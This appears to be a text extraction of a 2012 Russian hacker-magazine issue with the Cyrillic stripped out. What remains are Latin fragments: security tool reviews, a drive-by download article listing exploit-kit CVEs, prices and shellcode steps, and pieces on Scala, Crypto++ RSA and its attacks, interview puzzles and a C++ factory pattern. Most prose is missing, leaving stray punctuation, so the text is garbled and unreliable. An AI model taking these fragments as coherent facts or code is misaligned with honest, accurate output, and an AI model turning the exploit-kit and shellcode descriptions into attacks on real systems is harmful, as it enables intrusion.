. ,
max_input_vars ( 1000).

063

D1g1 , Digital Security (twitter.com/evdokimovds)

X-Tools

Landing Site

:
Wayne Huang
URL:
www.drivesploit.org
:
*nix/win

: Julien Tinnes
URL: metasm.cr0.org
: *nix/win

: Cong Zheng,
Ryan W Smith
URL: code.google.
com/p/apkinspector
: *nix

Exploit Server

Controller

Malware Server

DRIVE-BY DOWNLOAD

RUBY

ANDROID-

Drivesploit
Black Hat USA 2010,
DEF CON 18. metasploit-,
drive-by
download . ,
drive-by download ,
html iframe,
, ,

.

Aurora, 0-day IE
(CVE-2010-0249).
, ,
. , exploit-pack Metasploit .
Metasploit

.
Drivesploit:
Circumventing Automated and Manual Detection
of Browser Exploits (slidesha.re/a0zpH8).
,

.

METASM , , , !

(SSTIC, hack.lu, HITB, REcon).
Ruby.
:

APKinspector
apk-.
Android.
,

.

Android. APKinspector
:
(CFG);
Dalvik-;
-;
smali-;
Java-;
;
;
AndroidManifest.xml.

064

Intel IA32 (16/32/64 bits), MIPS PPC.


: ARM, Cell SPARC.

:
METASM , ,
. :
Raw ( -);
MZ, PE/COFF (32 64 bits);
ELF (32 64 bits);
Mach-O ( );
UniversalBinary;
(a.out, xcoff, nds).
:
,
backtracking , linux/windows/remote
API-, / C,
GDB- .

:

;
;
;
;
/
;

.

07 /162/ 2012

X-Tools

:
cr4sh

URL:
code.google.com/p/
ioctlfuzzer
:
Windows

:
Sebastian Porst
URL:
https://github.com/
sporst/SWFREtools
:
*nix/win

WINDOWS
IOCTL Fuzzer
Windows.
NtDeviceIoControlFile
IOCTL .
IOCTL-

.
:
GUI;
Windows 7;

:
Volatile Systems
URL:
https://www.
volatilesystems.com/
default/volatility
:
*nix/win/mac

64- Windows;
;

( IOCTL-
);
DbgCb;


;
/

.

:
Sebastian Weber
URL:
http-tunnel.sourceforge.net
:
win

FLASH

RAM

HTTP

SWFREtools Flash-. SOURCE Boston 2011 Sebastian Porst.




( )
SWF:
Flash Dissector (
SWF-);
SWF Parser (
);
Minimizer (
SWF-);
FP Debugger ( Flash
Player);
StatsGenerator (
SWF-).

Volatility ,
Python
(RAM).
,

, (,
). , :
;
;
;
DLL ;
;
;
;
;
;

.

HTTPTunnel,
, HTTP-,
HTTP GET- POST-.
, .
HTTP-,
HTTPTunnel ,
, telnet PPP,
. ,
:
Port mapping;
SOCKS4, SOCKS5;
;
- ;
;
standalone hosted-;
LDAP
MySQL.

, Flash,
:
, ;
;
;
, .
JHexView, splib Buggery.

07 /162/ 2012

,
,

Volatility.

:
,
, , . HTTP-

.
: PHP- - ,
Perl- win32-.

065

MALWARE

(drobotun@xakep.ru)

DRIVE-BY

WWW

-

DRIVE-BY
(
)
. ,
. !


drive-by ,
. , , , , , ,

CD-Man. ,
.
, , ,
. ,
,
iframe
, , JavaScript, .
, ,
.

066

-
- .
-
, ,
.
-

- ( )
.
API- URLDownloadToFile urlmon.dll,
.

- :
kernel32.dll
(
PEB);
kernel32.dll GetProcAddress;

www.exploitdb.com



.

wepawet.
iseclab.org.
,
,

,
-.

DVD


-
Malzilla.
.

API- LoadLibrary
GetProcAddress;
LoadLibrary urlmon.dll;
URLDownloadToFile
-
( WinExec
ShellExecute);

.



. , ,
- ,
,
.

07 /162/ 2012

drive-by -

JavaScript-

drive-by (: Google Anti-Malware Team)

- Exploit.HTML.IESlice.aa

Eleonore Exploit Kit

MDAC BlackHole Exploit Kit ( )

, . : ,
, -
.
(
-).
,

, - ,
. ,
, -
, ,

07 /162/ 2012

JavaScript-,
Rhino Script Engine Java (CVE-2011-3544)

,

( drive-by ,
, , ,
).
, ,

Adobe, Adobe
Reader, Java Oracle Corporation.
,
-
(, :))

Microsoft Data Access


Components (MDAC).
2006 , -
.

,
- :
Blackhole Exploit Kit;
Eleonore Exploit Kit;
Nuclear Pack;
Phoenix Exploits Kit;
Sakura Exploit Pack.
,

067

MALWARE

-
BlackHole Exploit Kit
.
malwaredomainelist.com
-. , 9097%
. , .
1.2.3, :

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2992 (Adobe Reader JavaScript Printf Buffer Overflow);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0842 (Java JRE MixerSequencer Invalid Array Index Remote
Code Execution Vulnerability);
CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2011-0559 (Adobe Flash Player Memory Corruption);
CVE-2011-3544 (Java Rhino Script Engine);
CVE-2012-0507 (Java Atomic).

( ): 1500,
1000, 700, () 50, 20, 200,
500, 200, (24 ) 50.
.
( -

BlackHole Exploit Kit ( )

) CVE-2012-0507.
AtomicReferenceArray,
Object[],
JRE.

Eleonore Exploit Kit


2009 ,
. 1.8.91. :

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2006-4704 (WMI Object Broker);
CVE-2008-2463 (M508-041 MS Access Snapshot Viewer);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0806 (Internet Explorer DHTML Behaviors Use After Free);
CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2010-4452 (Java ClassLoader Remote Code Execution);
CVE-2011-0558 (Adobe Flash Player Integer Overflow);
CVE-2011-0559 (Adobe Flash Player Memory Corruption);
CVE-2011-0611 (Adobe Flash Player Embedded .swf file);
CVE-2011-2462 (Adobe Reader U3D Object Memory Corruption);
CVE-2011-3521 (Java Update);
CVE-2011-3544 (Java Rhino Script Engine).

( ) 1000 , 50,
50, (24 ) 40.

068

Eleonore Exploit Kit ( )

07 /162/ 2012

drive-by -

Nuclear Pack
( 2010 )
( 2012 ).
,
.
:

CVE-2006-003 (Microsoft Data Access Components (MDAC));


CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2463 (M508-041 MS Access Snapshot Viewer);
CVE-2008-2992 (Adobe Reader JavaScript Printf Buffer Overflow);
CVE-2008-4844 (Internet Explorer 7 XML Exploit);
CVE-2009-0075/0076 (MS09-002-IE7 Memory Corruption);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2009-1136 (IE OWC Spreadsheet ActiveX control Memory
Corruption);
CVE-2010-0188 (Adobe Reader LibTiff);

CVE-2010-0840 (Java OBE);


CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2011-3544 (Java Rhino Script Engine).

900 ( ).
-
.
,
, ,
.
ifram,
OnMouseMove (
, ).

Phoenix Exploits Kit


-. 2009 .
-.
3.1. :

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2992 (Adobe Reader Javascript Printf Buffer Overflow);
CVE-2008-5353 (JRECalendar Java Deserialize);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2009-3867 (Java GSB);
CVE-2009-4324 (Adobe Reader doc.media.newPlayer);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0886 (Java Deployment Toolkit Component);
CVE-2010-1240 (Adobe Reader Embedded EXE Social Engineering);
CVE-2010-1297 (Adobe Flash Player NewFunction Invalid Pointer Use);
CVE-2011-3544 (Java Rhino Script Engine);
CVE-2012-0507 (Java Atomic).

-, 2200 .

Phoenix Exploits Kit

Sakura Exploit Pack


. , ,
, . :
CVE-2006-0003 (Microsoft Data Access Components (MDAC));
CVE-2010-0806 (IEPeers Remote Code Execution);
CVE-2010-0842 (Java JRE MixerSequencer Invalid Array Index Remote
Code Execution Vulnerability);
CVE-2011-3544 (Java Rhino Script Engine).

, , , -
MDAC-. ,

Sakura Exploit Pack

Sakura Exploit Pack

, ,
, .
: 0-day-
- . ,
,
( , , ,
Java), : . z

07 /162/ 2012

069

MALWARE

Anonymous

070

,
, .
. , .
, , .
07 /162/ 2012

- .
, ,
. , , .

20- . 26
,
.

?
- ?
, ?
, ,
.

-. -
, .
, -
, . ,
,
. ,
,
. -
, ,
.
: , ,
, , .
- .
,
,
, .

,
MALWARE-
(
10 000 )
-,
. :
, - Big Tits ,
,
. K , , ,
. ,
-,
.
,
. ,
,
0 .
,

, ,
.
, -
-
. 10 000
.
,


-.
,
,
. ,
(
,
40% ).

,
,
.
, - .

.

,

,
.

. ,

.
, ,
,
.
,
-
.

(Cybercrime
to ybercrime 2C).

DDoS-.
,
.

4
5

07 /162/ 2012

071

MALWARE
, BMW
X7.

,
.


- ,
.
, .
, .

, . .
-,
.
, , -
. -
. ,
,
,
,
,
.
, ,
. , 24 7
,
AV. , .
,
,
. , , .

-
.
. , , ,
SEO-.
,
.
,
: ,
,
.

, ,
. .

:
,
Group-IB

- -


.
: -


-.
.
.

,
.

072

:
. ,
.
, 273 (,

) . , , .
:

, . -

.
,

.
, ,
273,

272 ( ), .
: -

-. -
, ,
, -.
, ,
.
-
, ,
. ,


.
, -

07 /162/ 2012

, ,
.


,
. 50%,
. -
, .

.
,
( , , -, )
.
-,
.

, , , .
- 272 273. :
!
159 . . , , ,
.
:
-
, , .

-

07 /162/ 2012


, .
, , ,
?

.
. ,

. ,
,
, , .
, , :

,
.
,
.
, . ,
- ,
.

,
. , , ,

- . ,
. ,

, , -

, . ,
,

159- .
-
.
. .
,
,
. -,

. , .
. - . ,
, . -
.
, ,
-,

.
.

,
. -
-.
, 50%
.
,

,
. ,
.
-.

. ,

-
.

073

MALWARE






,

.
, . , -
,
EULA. ,
,
.

, .
,
, -, , .

,
, .

.
,
, .


2C?

10 000 .
, , -
. :
- 272 273. .
159- . .

INFO



:

,

.

,
, SuperWinAntivir ,
.
,
,
.
- . ,
.
, , .
, ,
.
.
, , ,
.
, .

,
.
, .

074

, , , IT.

.
- .
, .
, , ,
14 , .
, ,
, , Facebook Twitter, , ,
. z

07 /162/ 2012

Preview

94

HIGHLOAD
,
? , !
, ,
Highload.
-,
,

,
,
Facebook.
, , ,
.

76

SCALA-
JVM, Java
.
, Scala.

Highload

UNIXOID

106


, ,

suckless.org.

SYN/ACK

110


, ,
Android

Google ?

FERRUM

116

075

, UTM
,
, ,

, UTM.

128


FAQ Microsoft,
,
.

134

!
?
Intel X79 Express!

07 /162/ 2012

(twitter.com/ojowoo)

SCALA

SCALA

,


Scala ,
Java
,
, - ,

.

.
076

07 /162/ 2012

SCALA-

JVM?
JVM (Java Virtual Machine), ,
IT-. Java
. JVM . Scala
- , IT .
EPFL,
Scala , .
Scala ,
Java , , ,
,
, .
:
1. Java Virtual Machine, Java- ,
.NET LLVM.
2. Java , .
3. ,
.
4. -
, .

// 1 100
(1 to 100).sum
// "2,6"
List(1, 2, 3).filter(_ % 2 == 1).map(_ * 2).mkString(",")
// , 42
//
(1 to 1000000).par.count(_.toString.map(_.asDigit).sum == 42)
// "" : trait (
// ), - ,
// "this"
trait MyFunction[-A, +B] extends (A => B)
with Logging with Validation {
this: MyContext =>
}


Scala , ,
Generic Java, -
Java 1.5.
-
,
. Scala 2001 , 2003-
,
,
.
, ,
, Foursquare, Twitter, LinkedIn .

-
JVM .

07 /162/ 2012

Scala IDE Eclipse Scala

2011
Typesafe,
Scala-.
Typesafe Stack, , ,
SBT,
Scala IDE, - Play Akka.
.


, Scala.
,
, .
:
val list = List("a", "b", "c")//List[String]
val map = Map(1 -> "a", 2 -> "b", 3 -> "c")//Map[Int, String]

case classes, equals, hashCode, toString :


case class User(name: String, age: Int, address: Address)
case class Address(city: String, street: String)
val p = Person("Vasia", "21", Address("Moscow", "Arbat"))

(
, ,
):
// : BitSet(2, 4, 6),
BitSet(1, 2, 3).map(_ * 2)
// : Set("2", "3", "1"),
// Set, BitSet
BitSet(1, 2, 3).map(_.toString)
// : Map, 1 100

077


//
(1 to 100).groupBy(_.toString.map(_.asDigit).sum)

, ,
,
:
val i = "1".toInt // "1" java.lang.String
val date = today + 1.month + 5.days
println("%s - %d".format("Vasia", 21))

(tuples) :
def error = ("Not found", 404)
//
val (msg, code) = error
//


Java-
:
def box(width: Int = 100, height: Int = 200) = { /*...*/ }
box(height = 300) // box(100, 300)

:
lazy val data = ParseHugeFile()
//

, ( ,
):
def debug(msg: => String) = if (debugEnabled) println(msg)
// heavyMethod , debugEnabled
debug("Debug message: " + heavyMethod())

(
):
def closeResource(resource: { def close() })
{ resource.close() }

(pattern matching)

, :
val timeRegex = "(\\d{2}):(\\d{2}):(\\d{2})".r
someVar match {



,
,

JAVA-
078

case timeRegex(hh, mm, ss) => println(hh, mm, ss)


case List(a, List(1, b)) => println(a, b)
case _ => // default
}

, ,
, Scala . ,
,
Programming
in Scala (2nd edition). stackoverflow.com
google-.
, Scala
.

?

. Scala- Lift.

- Wicket, Rails, Django .
, . ,
, Lift, . ,
Foursquare, PHP
Lift, . , ,
, ,
.
, ,
,
- (Play) Scala-
, Lift, , .
- Play, , Typesafe Stack :
,
(Working hard to keep it simple).
Java--, . ,
, , - Java,
.
Scala,
, ,
, Play, Java.
. , , , ,
, .
, Play stateless-
, .
Scala- Akka
.
Typesafe Stack 2.0 , . Akka
Erlang ,
Actor, . ,
STM (Software Transactional
Memory),
, -

07 /162/ 2012

SCALA-

, deadlock
. , Dataflow Concurrency,
, .
Actor Akka ,
,
Actor
.
,

,
. Actor , , .
,
.
, Scala . Twitter
Foursquare.
,
, ,
( Play Akka) Java-.

,
,
. milestone-

Scala 2.10,
,
. , ,
, ,
. Scala-
Nemerle,
, ,
.
, Scala,
.

( ),
,
.

, , , Microsoft LINQ. Scala
Dynamic, (
), trait ,

. ,
3.0,
, 3,
, ,
, ,
.
, . z

PAUL PHILLIPS AKA DOT-COM


: ( ) Scala ,
Dot-Com.
( ) ,
, - .
Scala,
.
Typesafe , ,
.

SCALA DAYS 2012



Scala-, 500
.
Barbican .


12-
Scala . ,

. , Scala-
, . indeed.com,
Scala- 2011 .
Play Scala IDE

07 /162/ 2012

079

fft24




CRYPTO++ RSA


,
(
)

,
.
,

Crypto++,

RawRSA .

RSA

080

. , ,

, , ( ).
RSA,
, - .

, ,
(, Python)
. , Crypto++.


Crypto++
Integer,
WORD, , ( ). Crypto++ ,
, ,
, . :
,
.

07 /162/ 2012

).
, . Cryptopp ,
,
,
,

.
, ,
:

int CRYPTOPP_FASTCALL Baseline_Add(


size_t N,
word *C,
//
const word *A,
// A
const word *B)
// B
{
assert (N%2 == 0);
// WORD
Declare2Words(u);
// u
AssignWord(u, 0);
//
for (size_t i=0; i<N; i+=2)
{
AddWithCarry(u, A[i], B[i]);
C[i] = LowWord(u);
AddWithCarry(u, A[i+1], B[i+1]);
C[i+1] = LowWord(u);
}
return int(GetCarry(u));
}


,
friend- PositiveSubstract
PositiveAdd.
. .


,
, Toom Cook
.
,
O(n^2)
, O(n^1,5849), .
Crypto++
.

void RecursiveMultiply(
word *R,
word *T,
const word *A,
const word *B,
size_t N)
{
// :
// < 8,
if (N <= s_recursionLimit)
s_pMul[N/4](R, A, B);
else
{
// (A = A0 + A1*x)
...
// R
// N/2 (R[0123])
// R[23] = A1*B1
RecursiveMultiply(R2, T2, A1, B1, N2);
// T[01] = (A1-A0)*(B0-B1)
RecursiveMultiply(T0, T2, R0, R1, N2);
// R[01] = A0*B0
RecursiveMultiply(R0, T2, A0, B0, N2);
//
// ,
int c2 = Add(R2, R2, R1, N2);
int c3 = c2;
c2 += Add(R1, R2, R0, N2);
c3 += Add(R2, R2, R3, N2);
if (AN2 == BN2)
c3 -= Subtract(R1, R1, T0, N);
else
c3 += Add(R1, R1, T0, N);

(a + bx)(c + dx) = ac + (ac + bd (a b)(c d))x + bdx^2

. A
A = A0 + 2^(N/2)*A1 ( N
N/2 ), A0*B0, A1*B1, (A0-A1)*(B0-B1).
.
N N/2
/, (

RSA,
6 ( p N)

07 /162/ 2012

c3 += Increment(R2, N2, c2);


assert (c3 >= 0 && c3 <= 2);
Increment(R3, N2, c3);
}
}

,
,

OAEP, Timing attack

OAEP

081


(
: goo.gl/rAAkE).


.
, ( ). : m e,
e=(e[k], e[k-1], ...,
e[0]) = e[k]*2^k + ... + e[1]*2 + e[0].
:
s[1] = m
for i = 1,2,...,k
s[i+1] = (s[i]^2)*m^(k-i)

, ,
n, O(log n).

(
). Crypto++
,
, .

(goo.gl/qkZpi).

RSA
RSA 1980- : (Ronald Linn Rivest),
(Adi Shamir) (Leonard Adleman). RSA
. RSA (one-way trapdoor
function), , ,
() . RSA trapdoor function
:
x -> x^e mod N

N = p*q .

RAWRSA
, RSA, RawRSA.
-
( ), - ,
. RawRSA
RSA-OAEP, RSA-OAEP+,
RSA-SAEP+ . RawRSA
: p q,
N=p*q,
p(N) = (p-1)(q-1).
e d, , e*d = 1 mod p(N).
(e, N) , (d, N) . (d,
p, q). m (1 <= m < N) (e, N) :
s = m^e mod N

s (d, N) -

082

m
:
m = s^d mod N

RAWRSA
/
RawRSA
Crypto++ (RawRSA
). :
Integer& RawRsaEncrypt(Integer& m, Integer& N, Integer& e)
{
RSA::PublicKey pubKey;
pubKey.Initialize(N, e);
return (pubKey.ApplyFunction(m));
}

, . :
Integer& RawRsaDecrypt(Integer& s, Integer& N,
Integer& e, Integer& d)
{
RSA::PrivateKey privKey;
AutoSeededRandomPool prng;
privKey.Initialize(N, e, d);
return (privKey.CalculateInverse(prng, s));
}

, RawRSA: s (
) d N,
e s N. CalculateInverse
, ,
d, e, p, q. ,
, p q,
, N
Initialize ( e d).

RSA-OAEP
, RawRSA
, 1994
(Mihir Bellare)
(Phillip Rogaway) RSA, OAEP Optimal
Asymmetric Encryption Padding.
PKCS#1 ( v2.0)
.
, ,
.

, ,

. :
,
,
.

. RSA-OAEP

. RSA-OAEP
RawRSA .
RSA-OAEP (, AES 128 ) , N,
:

07 /162/ 2012




:
18-28

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

step@real.xakep.ru


m || 01 || 00000... || rand

//
size_t ecl = encryptor.CiphertextLength(plaintext.size());
SecByteBlock ciphertext( ecl );

rand . H G :
((m || 01 || 00000...) xor rand H(rand)) ||
(rand xor G(msg || 01 || 00...))

RawRSA. - H G
SHA-256, . RSA-OAEP,
AES, RSAES-OAEP
Crypto++ RSAES_
OAEP_Encryptor RSAES_OAEP_Decryptor,
.
, :
//
AutoSeededRandomPool rng;
InvertibleRSAFunction parameters;
parameters.GenerateRandomWithKeySize( rng, 1536 );
RSA::PrivateKey privateKey( parameters );
RSA::PublicKey publicKey( parameters );

//
encryptor.Encrypt( rng,
plaintext,
plaintext.size(),
ciphertext );
RSAES_OAEP_SHA_Decryptor decryptor( privateKey );
//
size_t dpl = decryptor.MaxPlaintextLength(
ciphertext.size() );
SecByteBlock recovered( dpl );
DecodingResult result = decryptor.Decrypt( rng,
ciphertext, ciphertext.size(), recovered );

, .
, Crypto++ ,
.


Cryptopp,
, RSA. ,
Cryptopp
, , , . z

// 128
static const int SECRET_SIZE = 16;
SecByteBlock plaintext( SECRET_SIZE );
memset( plaintext, 'A', SECRET_SIZE );
RSAES_OAEP_SHA_Encryptor encryptor( publicKey );

INFO

RSA

N.

.

.
( N),
m^e < N, mod
N,
e m^e
.
e = 2^16 + 1.
,
d,
, ,
(Michael J. Wiener).
RSA d < N^0,25.
Timing-,
, ,
,
d.
(Paul Kocher) 1999
RSA -.
,
.
Power attack.

1
2

084

Fault attack RSA.



,
.
N,
. ,

, 15%
, .
.
RSA
,
seed. -
p q
,
N1 N2 .
(Nadia Heninger) (Arjen Lenstra)
,
N 0,4%
HTTPS-.
.

p q,
,
.




.
PKCS Public
Key Cryptography
Standard
,

RSA Data
Security.

07 /162/ 2012

!
8-800-200-3-999
+7 (495) 663-82-77 ()



40 % .

6 1194 .
12 2149 .

6 810 .
12 1499 .

6 1110 .
12 1999 .

6 894 .
12 1699 .

6 564 .
13 1105 .

6 599 .
12 1188 .

6 1110 .
12 1999 .

6 810 .
12 1499 .

3 630 .
6 1140 .

6 895 .
12 1699 .

6 690 .
12 1249 .

6 775 .
12 1399 .

6 1110 .
12 1999 .

6 1110 .
12 1999 .

6 950 .
12 1699 .

shop.glc.ru

(ivinside.blogspot.com)
(alex@skazo4neg.ru)


,

.
<Enter>,
Java, Python Linux. !

1
,
( <Enter>
)?
<Enter> , !
(
),
, - .
,
086

. ,
<Enter> .
. ,
. IP-
. DNS, DNS- , IP
site.ru,
.
(http://site.ru) (site.ru:81),
80- HTTP-.
, :

07 /162/ 2012

$ telnet site.ru 80
GET / HTTP/1.1
Host: site.ru

GET
site.ru. , , User-Agent, Accept, Connection .
Live HTTP Headers Firefox,
. , HTTP/1.1
200 Ok , , .

2
access- -,
..
[10/Jul/2010:00:13:18 +0400] pogoda.yandex.ru 2.2.2.2 "GET
/chernigov HTTP/1.1" 200 "http://www.yandex.ua/"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0)" 113
[10/Jul/2010:00:13:19 +0400] pogoda.yandex.ru 3.3.3.3 "GET
/russia HTTP/1.1" 200 "http://pogoda.yandex.ru/27612/
choose/" "Opera/9.52 (Windows NT 6.0; U; MRA 5.5
(build 02842); ru)" 119
[10/Jul/2010:00:13:20 +0400] pogoda.yandex.ru 5.5.5.6 "GET
/ HTTP/1.1" 302 "http://www.yandex.ru/"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;
.NET CLR 3.0.30729; InfoPath.2)" 203

, ,
:
1. -3 , (/) (/moscow),
;
2. 95% ( )
(/kiev).

1. Linux.
,
, (/)
(/moscow).
: GET / HTTP/1.1 GET /moscow HTTP/1.1.
egrep, , | ().
. ,
,
( , access.log ,
,
User-Agent, ,
).
,
User-Agent. cut ( awk, sed).
,
. sort uniq. ,
, .
, head
07 /162/ 2012

.
-:
egrep 'GET / HTTP/1.1|GET /moscow HTTP/1.1' ./access.log
| cut -d ' ' -f 9 | sort | uniq -c | head -3

2. , Python:
timelist = []
#
for line in open('access.log'):
#
if 'GET /kiev HTTP/1.1' in line:
#
line = line.split(' ')
#
timelist.append(line[-1].strip())
#
timelist.sort()
# ,
# 95%
print timelist[int(len(timelist) * 0.95)]

3
Java lock-free BigInteger next(), . .
.
0, 1, 1, 2, 3,
5, 8, 13, ...,
.
F(n)
F(0) = 0, F(1) = 1, F(n) = F(n 1) + F(n 2), n >= 2

, F(n 1) F(n 2) , , . (synchronized


java.util.concurrent.locks.Lock),
lock-free-. , lockfree- ,
. ,
, , ,
, , .
.
:
1. .
2. .
3. CAS
(compareAndSwap/compareAndSet) .
4. 1.
,
- .

compareAndSwap ( ),
:

087


boolean compareAndSet(int store,
int expected,
int newValue)
{
if (store == expected) {
store = newValue;
} else {
return false;
}
}

// 2.
next = current.calculateNext();
// 3.
// CAS-
// 4. 1
} while(!state.compareAndSet(current, next));
//
//
return current.prevNumber;
}
}

,
( , store, ).
Java , .
1.5 Java java.util.
concurrent.atomic, AtomicBoolean,
AtomicInteger ; , CAS (compareAndSet,
incrementAndGet ).
AtomicBigInteger, , (F(n 1), F(n 2)) . ,
,
, AtomicReference
.
public class LockFreeFib {
// immutable- F(n 1), F(n 2)
//
private static class PrevFibNumbers {
//
// final
private final BigInteger currentNumber;
private final BigInteger prevNumber;
protected PrevFibNumbers(BigInteger currentNumber,
BigInteger prevNumber) {
super();
this.currentNumber = currentNumber;
this.prevNumber = prevNumber;
}
//
//
// PrevFibNumbers
public PrevFibNumbers calculateNext() {
return new PrevFibNumbers(
currentNumber.add(prevNumber), currentNumber);
}
}
private AtomicReference<PrevFibNumbers> state =
new AtomicReference<PrevFibNumbers>(
new PrevFibNumbers(BigInteger.ONE, BigInteger.ZERO));
/*
*
*
*/
public BigInteger next() {
PrevFibNumbers current = null;
PrevFibNumbers next = null;
do {
// 1.
current = state.get();

088

, ,
, . CAS
( ) ,
- .

4
,
.
, ,
. 100 , 99 101 . , , , .
. ?
,
, . : .
, , , .
,
100 , .
: 100 , 99 .
,
. : 99 .
: 99
. : . z


1. ,
.
. ,
?
2. 100 . 99%.
98%. ?
: , , , /. .
3. -
: ERROR at line 15: ORA-01790: expression must have
same datatype as corresponding expression.
?
?
,
? , ,
?
4. ,
?

07 /162/ 2012

deeonis (deeonis@gmail.com)





- .
,

. ,
?

.
.

090

, ,
, .

. ,
.
, , , .
, , .


class User
{
public:
User(string login, string password)
: m_login(login), m_password(password)
{
};
~User();
string getLogin() { return m_login; }
string getPassword() { return m_password; }
void setLogin(string login) { m_login = login; }
void setPassword(string password) { m_password = password; }
// ...
private:
string m_login;
string m_password;
}

07 /162/ 2012

. User , login, password .


,
. , , , ,
.
, , .
, ,
, ,
, ,
.
, ,
- AdminUser. .

class AdminUser
{
public:
AdminUser(string login, string password)
: m_login(login), m_password(password)
{};
~AdminUser();
// getXXX setXXX
// User
// ,
private:
string m_login;
string m_password;
}


class UserBase
{
public:
User(string login, string password)
: m_login(login), m_password(password)
{
};
~User();
virtual string getLogin() { return m_login; }
virtual string getPassword() { return m_password; }


AdminUser,
User. , ,
, ,
.

const int SIMPLE_USER = 1;
const int ADMIN_USER = 2;
int userType;
string login;
string password;
// userType, login, password
//
if (userType == SIMPLE_USER)
{
User user(login, password);
}
else if (userType == ADMIN_USER)
{
AdminUser user(login, password);
}

,
,
.
.
BaseUser ,
. ,
.

07 /162/ 2012

virtual void setLogin(string login) { m_login = login; }


virtual void setPassword(string password) {
m_password = password; }
// ...
private:
string m_login;
string m_password;
}
class User : public UserBase
{
public:
User(string login, string password)
: UserBase(login, password)
{
};
virtual ~User();
// ,
//
}
class AdminUser : public UserBase
{
public:
AdminUser(string login, string password)
: UserBase(login, password)
{
};
virtual ~AdminUser();

091


(AdminUser, User )
. ,
. -
. , .
.
-
,
. ,
, . .

class UserFactory
{
public:
// ...
UserBase* createUser(int userType, string login,
string password)
{
BaseUser *user;
switch (userType)
{
case ADMIN_USER:
user = new AdminUser(login, password);
break;
case SIMPLE_USER:
user = new User(login, password);
break;
}
return user;
}
}
Python

// ,
//
}
//
UserBase *user;
if (userType == SIMPLE_USER)
{
user = new User(login, password);
}
else if (userType == ADMIN_USER)
{
user = new AdminUser(login, password);
}

.
- ,
. -,
- .

,
, . .
,
,
, -, , . , , .
,

092

, ? UserFactory,
-
createUser(). ,
, , .
, , .
createUser() .
.
.
.
.
.
. ,
. ,
, .

AdminUser *admin;
UserFactory uf();
admin = uf.createUser(ADMIN_USER, login, password);

.
. ,
- ,
. z

07 /162/ 2012

- Digital Photo School

Digital Photo ,
; ;
. , ,

. ,
Samsung,
- Digital Photo School.
,
-,
. ,


Samsung NX.
16
,
, . ,
digital-photo.ru/school/
,
. , , ,

,

. .
- , .
- ,
,
-,

Samsung . ,
,
-,
Digital
Photo School. , DVD Digital Photo.
Digital Photo School
(8 ) 02.06.2012 15.01.2013
7 - 23.06.2012 15.12.2012
2013
DIGITAL-PHOTO.RU/SCHOOL/

Digital Photo School


2013 , 50
.
Digital
Photo School Samsung NX200.

. Samsung
NX ,

.
NX200
, .

-
,

, ,


,
.

, ,
, , Photosight.ru .


.
,

.
,

094
09
94

07 /162/ 2012

. 1

,
, , ,

.
-
. , , , , ,
, .
,
, , ,
,
.


-
, ,
.
-.
.
,
, ,
, -
.

CommuniGate Pro. ,
.
,
.
, -
.
.
. ,
.
.
, ,
- . .

07 /162/ 2012

, ,
Facebook. . ,

. ,
(, ,
, ) ,
.
.
,
:
? ,
?
, ,
,
Amazon. ,

.
,
: ! Amazon

-,
cloud-.
-
,
:
,
Amazon, ,
?

- -

.
,

,
,
.
. ,
,
.
, .
.
- , ,
. , ,
,
-
, ,
.
,
.
, ,
, PHP. ,
CGI script - .
, CGI script
,
.
- ,

: ,
. API -

095

, ,
,


.

,
,
,
,
.

.

, ,
. , ,
,

.

, .


.
,
-

.
:
,
, ,

.
: REST API HTTP
.
,
.
: Erlyvideo,

.
Erlang.

, ,

096

,
: . ? ,

, ,

.
-.

-
. ,
.
,
, . .
Google
.
- :
?

?, , ,
: .
big data,
.
,
.
,

,
,
.
.
,
,
Google+. -

07 /162/ 2012

. 1

,
,
.
Facebook, Google, . , ,
, ,
-. .
? - -
. , , ,
, .
, , , , ,
.
,
, .
- , , ,
, .
, , . -,
.
.
,
, , ,
, ,

. , DYNAMODB
AMAZON

07 /162/ 2012

.
,
,
: !

(, ,
-
),
,
,

.

Facebook, , -,
- ejabberd-.

.
,
.
,
,
. ,
:
100 .
, .

, ,
,

,
,

.
, .

,
,
, 20. ,
,
,
,
,
,
.


.
,

097


. -
,

. , DynamoDB
Amazon
. DynamoDB Cassandra, Hadoop .
, ,
DynamoDB, .
, . Google
- . ,
,
, , DeNA ()
.
, .
- , ,
, Not invented here.

, - .
, Google Translate ,
-, ,
. Microsoft,
.
.
. ,
, ,
, ,
. ,
, , big data
web scale, ,
usability, .
, .


,
.

.

, .
,
.

,
, ,

. ,
Stack Overflow.
.
,
? ,
, ,
, , . -
.

,
.
.
,


. ?


. ,
. , ,
,
. .
?

. .
- .
, .
, .
, .
.

098

07 /162/ 2012

. 1

, ,
, - . -
.
,
, . , ,
. , - ,
,
cron .
, ,
.


,
. , .
, - .
.
, ,
,
( , ). ,
( ), .
,
, , , , , , .
, , - .
, , , .
, ,
. ,
. .
, . z

HIGHLOAD-

Highload.


,

-.

HighLoad++ (www.highload.ru).
,
,


.


.


,


MySQL,
. MySQL
.
MySQL 5.5.
Mail.Ru
NoSQL Tarantool, 500600
.
open-source
.

,
,

.
Erlyvideo
(erlyvideo.org). , .

.

, ( ,
Mail.Ru). ,

60 .

-

.
,

,
.
-

, ,
-
.

07 /162/ 2012

099

1
1.
1.1.
1.2.
2.

4

:

-

2.1.
2.2.
2.3.

3.

2
4.
4.1.
4.1.1.
4.1.1.1.
